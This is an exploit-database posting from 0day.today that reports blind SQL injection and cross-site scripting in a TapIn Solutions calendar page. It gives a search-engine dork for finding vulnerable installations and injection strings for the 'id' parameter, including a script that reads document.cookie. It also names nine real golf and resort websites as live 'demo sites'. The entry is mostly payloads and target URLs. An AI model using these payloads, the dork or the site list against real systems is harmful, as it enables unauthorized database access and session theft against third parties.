[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TapIn Solutions, LLC (Blind/xss) Multiple Vulnerabilites

Author
Angel Injection
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-16555
Category
web applications
Date add
23-07-2011
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Exploit Title: TapIn Solutions, LLC(Blind/xss) Multiple Vulnerabilites 
Author: Angel Injection
url: http://www.tapinllc.com/
Security -::RISK: Critical
Dork: intext:"powered by TapIn Solutions, LLC"

blind sql
http://localhost/calendar.php?id=5' [blind sql"

You have an error in your SQL syntax;

http://localhost/calendar.php?id=5+and+1=2

cross site scripting

http://locslhost/calendar.php?id=5 [xss]

http://localhost/calendar.php?id=5"><script>alert(document.cookie)</script>

DEMO SITES

http://www.playcolumbiapark.com/calendar.php?id=5
http://www.santamariacc.com/calendar.php?id=5
http://www.pasadera.com/calendar.php?id=5
http://grizzlyranch.com/calendar.php?id=5
http://www.pasoroblesgolfclub.com/calendar.php?id=5
http://www.genevanationalresort.com/calendar.php?id=5
http://www.bayonetblackhorse.com/calendar.php?id=5
http://www.playcolumbiapoint.com/calendar.php?id=5
http://www.stevinsonranchgolf.com/calendar.php?id=5



#  0day.today [2024-12-26]  #